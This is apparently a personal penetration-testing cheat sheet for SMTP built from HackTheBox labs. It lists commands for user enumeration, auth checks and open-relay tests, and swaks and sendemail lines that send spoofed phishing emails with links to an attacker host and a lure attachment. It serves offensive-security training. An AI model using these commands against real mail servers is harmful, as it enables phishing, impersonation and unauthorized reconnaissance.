[25,465,587] SMTP
Default Configuration: /etc/postfix/main.cf
Verify User without send email
Intrusionz3r0X@htb[/htb]$ swaks --auth-user 'administrator@mailing.htb' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htbEnumerate SMTP
#Enumerate the service
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sC -sV -p25
# Open Relay checks (Using 16 different tests)
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v
Intrusionz3r0X@htb[/htb]$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
# User enumerationV
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
#Open realy attack
Intrusionz3r0X@htb[/htb]# nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
Intrusionz3r0X@htb[/htb]# swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213
#Enumerate Users by using VRFY
VRFY root
252 2.0.0 root
VRFY new-user (Users doesn't exists)
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
#Enumerate Users by using EXPN
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
#Enumerate Users by using RCPT TO
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient okSend Emails tools
#Sendemail
Intrusionz3r0X@htb[/htb]$ sendemail -t nico@megabank.com -f customer@inlanefreight.htb -a Invoice.rtf -u "Subject: Please check this out" -s 10.10.10.77 -v
#Swaks
Intrusionz3r0X@htb[/htb]$ swaks --to itsupport@domain.htb --from intrusionz3r0@gmail.com --server mail.server.com --body "Please check this changes out: http://AttackerIP:8080/" --header "Subject:Internal Web App Request"
Users Email path
/var/spool/mail/<username>
Abuse SMTP relay via sending malicious php code and LFI
Last updated